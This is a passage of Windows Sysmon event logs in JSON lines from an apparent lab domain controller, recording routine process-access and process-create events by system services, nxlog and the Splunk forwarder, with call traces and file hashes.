{"EventTime":"2020-08-01 07:02:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8780,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:54.576\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-139E-5F25-0000-00103D901000}\r\nTargetProcessId: 4872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:54.576","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-139E-5F25-0000-00103D901000}","TargetProcessId":"4872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8781,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:54.669\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-00108D2E1000}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:54.669","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-00108D2E1000}","TargetProcessId":"1576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8782,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:54.669\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-00108D2E1000}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:54.669","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-00108D2E1000}","TargetProcessId":"1576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8783,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:54.669\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-00108D2E1000}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:54.669","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-00108D2E1000}","TargetProcessId":"1576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8784,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:55.591\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:55.591","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8785,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:56.607\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:56.607","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8786,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:56.655\r\nProcessGuid: {E2A3D6B1-13A0-5F25-0000-001033991000}\r\nProcessId: 2512\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:02:56.655","ProcessGuid":"{E2A3D6B1-13A0-5F25-0000-001033991000}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8787,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:56.654\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-13A0-5F25-0000-001033991000}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:56.654","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-13A0-5F25-0000-001033991000}","TargetProcessId":"2512","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program 